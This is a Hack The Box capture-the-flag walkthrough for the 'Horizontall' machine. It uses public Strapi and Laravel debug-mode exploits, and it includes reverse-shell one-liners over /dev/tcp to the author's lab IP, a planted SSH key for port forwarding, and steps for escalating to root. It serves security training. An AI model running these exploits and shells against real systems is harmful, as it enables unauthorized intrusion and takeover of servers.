--- search: exclude: true --- # Horizontall Writeup ![](img/68.png) ## Introduction : Horizontall is an easy Linux box released back in August 2021. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → sudo vim /etc/hosts [sudo] password for nothing: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → nmap -sCV -p- horizontall.htb Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 15:08 UTC Nmap scan report for horizontall.htb (10.129.17.82) Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA) |_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-title: horizontall |_http-server-header: nginx/1.14.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80 so let's investigate it: ![](prg/68_001.png) Trying to run gobuster on this site yields no results, so instead we look for other clues by intercepting the traffic with burpsuite: ![](prg/68_002.png) And here we found out that there was another domain we could use: **api-prod.horizontall.htb** so let's add it to our hosts file: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → sudo vim /etc/hosts [sudo] password for nothing: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → cat /etc/hosts | grep horizontall 10.129.17.82 horizontall.htb api-prod.horizontall.htb So let's browse to the api endpoint at **http://api-prod.horizontall.htb/reviews** : ![](prg/68_003.png) Then let's enumerate it with gobuster: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://api-prod.horizontall.htb =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://api-prod.horizontall.htb [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.3 [+] Timeout: 10s =============================================================== 2022/11/20 15:47:07 Starting gobuster in directory enumeration mode =============================================================== /reviews (Status: 200) [Size: 507] /users (Status: 403) [Size: 60] **/admin (Status: 200) [Size: 854]** /Reviews (Status: 200) [Size: 507] /Users (Status: 403) [Size: 60] /admin looks interesting, so let's investigate it: ![](prg/68_004.png) Here we have a strapi admin login webpage, so let's take a look at the available exploits for it: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → searchsploit strapi ----------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------- --------------------------------- Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb ----------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Let's use the Unauthenticated exploit: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → cp $(locate 50239.py) . [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → vim 50239.py [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → python3 50239.py http://api-prod.horizontall.htb/ [+] Checking Strapi CMS Version running [+] Seems like the exploit will work!!! [+] Executing exploit [+] Password reset was successfully [+] Your email is: admin@horizontall.htb [+] Your new credentials are: admin:SuperStrongPassword1 [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyMjQ1LCJleHAiOjE2NzE1NTQyNDV9.9bnkS2ZxD8V5_RR-urF403xy8g-VVYaeukmKEBBGCK4 $> This exploit basically resets the **admin@horizontall.htb** user's password to **SuperStrongPassword1** so once we ran it we can login: ![](prg/68_005.png) but the more interesting part is that we can execute code: $> bash [+] Triggering Remote code executin [*] Rember this is a blind RCE don't expect to see output id However as you can see it is a blind RCE, we can't see any output, so to counter that we're going to get a reverse shell instead: [term 1] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → nc -lvnp 9999 [term2] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → python3 50239.py http://api-prod.horizontall.htb/ [+] Checking Strapi CMS Version running [+] Seems like the exploit will work!!! [+] Executing exploit [+] Password reset was successfully [+] Your email is: admin@horizontall.htb [+] Your new credentials are: admin:SuperStrongPassword1 [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY4OTYyNDc3LCJleHAiOjE2NzE1NTQ0Nzd9.5lNGdTyiV9d-ciGggW5Z5Y6OJNZPARJAWBtM41qxW7A $> bash -c 'bash -i >& /dev/tcp/10.10.16.14/9999 0>&1' [+] Triggering Remote code executin [*] Rember this is a blind RCE don't expect to see output [term1] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → nc -lvnp 9999 Connection from 10.129.17.82:42004 bash: cannot set terminal process group (1975): Inappropriate ioctl for device bash: no job control in this shell strapi@horizontall:~/myapi$ id id uid=1001(strapi) gid=1001(strapi) groups=1001(strapi) strapi@horizontall:~/myapi$ Now that we got a reverse shell, let's upgrade it to a fully interactive tty: strapi@horizontall:~/myapi$ which wget curl python python3 which wget curl python python3 /usr/bin/wget /usr/bin/curl /usr/bin/python /usr/bin/python3 #spawn a TTY shell with python3: strapi@horizontall:~/myapi$ python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' #CTRL+Z to background the process strapi@horizontall:~/myapi$ ^Z [1] + 3112123 suspended nc -lvnp 9999 #stty raw it and then bring it back to the foreground: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → stty raw -echo ; fg [1] + 3112123 continued nc -lvnp 9999 #then set the TERM and SHELL env variables and the tty rows and colums: strapi@horizontall:~/myapi$ export TERM=screen-256color strapi@horizontall:~/myapi$ export SHELL=bash strapi@horizontall:~/myapi$ stty rows 30 cols 200 #reset to refresh the terminal strapi@horizontall:~/myapi$ reset Now that we have a fully interactive TTY reverse shell, we can go grab the user flag: strapi@horizontall:~$ cd /home/ strapi@horizontall:/home$ ls developer strapi@horizontall:/home$ cd developer/ strapi@horizontall:/home/developer$ ls composer-setup.php myproject user.txt strapi@horizontall:/home/developer$ cat user.txt fcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the user flag. ## **Part 3 : Getting Root Access** Now just like on the BountyHunter box, we use linpeas.sh to enumerate privesc paths: [term1] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → cp ../BountyHunter/linpeas.sh . [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... [term2] strapi@horizontall:/tmp$ wget http://10.10.16.14:9090/linpeas.sh strapi@horizontall:/tmp$ chmod +x linpeas.sh strapi@horizontall:/tmp$ ./linpeas.sh ` ![](prg/68_006.png) Now what's interesting here is the local port 8000: ![](prg/68_007.png) As it is written, it's a local port, so let's port forward it via SSH: [term1] strapi@horizontall:~$ mkdir .ssh strapi@horizontall:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAfhgjcMFy5mO4fwhQyW6vdX5bgTzqZTh9MhCW7+k6Sj nothing@nowhere' > .ssh/authorized_keys [term2] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sun Nov 20 17:04:40 UTC 2022 System load: 0.0 Processes: 183 Usage of /: 82.1% of 4.85GB Users logged in: 0 Memory usage: 45% IP address for eth0: 10.129.17.82 Swap usage: 0% 0 updates can be applied immediately. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Sun Nov 20 17:01:35 2022 from 10.10.16.14 $ [term3] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → nmap -sCV 127.0.0.1 -p 8000 Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 17:05 UTC Nmap scan report for localhost (127.0.0.1) Host is up (0.000048s latency). PORT STATE SERVICE VERSION 8000/tcp open http (PHP 7.4.22) | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found | Date: Sun, 20 Nov 2022 17:05:31 GMT | Connection: close | X-Powered-By: PHP/7.4.22 | Cache-Control: no-cache, private | date: Sun, 20 Nov 2022 17:05:31 GMT | Content-type: text/html; charset=UTF-8 | <****!DOCTYPE html> | <****html lang="en"> | <****head> | <****meta charset="utf-8"> | <****meta name="viewport" content="width=device-width, initial-scale=1"> | <****title>Not Found <****/title> | <****!-- Fonts --> | <****link rel="preconnect" href="https://fonts.gstatic.com"> | <****link href="https://fonts.googleapis.com/css2?family=Nunito &display;=swap" rel="stylesheet"> | <****style> | normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-app | GetRequest: | HTTP/1.0 200 OK | Date: Sun, 20 Nov 2022 17:05:26 GMT | Connection: close | X-Powered-By: PHP/7.4.22 | Content-Type: text/html; charset=UTF-8 | Cache-Control: private, must-revalidate | Date: Sun, 20 Nov 2022 17:05:26 GMT | pragma: no-cache | expires: -1 | Set-Cookie: XSRF-TOKEN=eyJpdiI6InJ6Rjhhc0RMR3E0d242U0NrNzNzQ3c9PSIsInZhbHVlIjoiSWNaeGhCZitFTURXR2VlM005QmdsVm5BNFk2cThPN0g1OEJvTi9iUFYyNEpHQWJMZTJuTmtPVGZla3NwbFl5NkhNRHF4ajRBTFFoYzJaL2FCK2pocVkyMTIwVHBqeWRieU1zQWE4S095T1dOTG1rWkZURGF2RnVteTlmdTJ0S0MiLCJtYWMiOiIxZDM2ODdjZjExMmQxYzY4M2Y3ZjZiN2JlYjk2NzNkMWE0YTJkMGExOTkxZjAyZDE4ZDNjMzVjNmI3NTQ0NjdhIn0%3D; expires=Sun, 20-Nov-2022 19:05:26 GMT; Max-Age=7200; path=/; samesite=lax |_ Set-Cookie: laravel_session=eyJpdiI6IkhtTlZjUnBzZ2RkSDNZMGNhNjA5bWc9PSIsInZhbHVlIjoiYXY0QlozV004N2pydDZ5MVJ2QnJ2RmRnZUYrWVdQR0l4VWVJWmhaMFdpSXFITDdrVnNzYzF4RGhFZlkxczlmSEtaQkFrUDlLcVVXQlBiOTh3U3FxclpoVGxpaDNZMzkvSXhreEZON3 After port-forwarding the port 8000 we see it's a laravel webserver: ![](prg/68_008.png) [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://127.0.0.1:8000 =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://127.0.0.1:8000 [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.3 [+] Timeout: 10s =============================================================== 2022/11/20 17:12:29 Starting gobuster in directory enumeration mode =============================================================== /profiles (Status: 500) [Size: 616204] gobuster found /profiles so let's investigate it: ![](prg/68_009.png) So we know that there's a laravel 8 website on port 8000, and where it is located on the machine thanks to the error we're seeing in /profiles, so let's look for exploits: [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → while true ; do sshpub -L 8000:127.0.0.1:8000 strapi@horizontall.htb -i ~/.ssh/mainpc ; done #since the ssh port forwarding keeps dying, run it like that ^ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → searchsploit laravel 8 ----------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------- --------------------------------- Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection | php/webapps/50538.txt Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt **Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py** Laravel Log Viewer <****0.13.0 - Local File Download | php/webapps/44343.py Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) | php/webapps/50525.txt PHP Laravel Framework 5.5.40 / 5.6.x <****5.6.30 - token Unserialize Remote Command Executi | linux/remote/47129.rb UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py ----------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Let's take a look at the RCE one: [term1] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → python 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'bash -c "(bash -i &>/dev/tcp/10.10.16.14/4444 0>&1)&"' Exploit... [term2] [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall] → nc -lvnp 4444 Connection from 10.129.17.82:33968 bash: cannot set terminal process group (27737): Inappropriate ioctl for device bash: no job control in this shell root@horizontall:/home/developer/myproject/public# root@horizontall:/home/developer/myproject/public# id id uid=0(root) gid=0(root) groups=0(root) root@horizontall:/home/developer/myproject/public# cd cd root@horizontall:~# cat root.txt cat root.txt bdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/68_graph.png)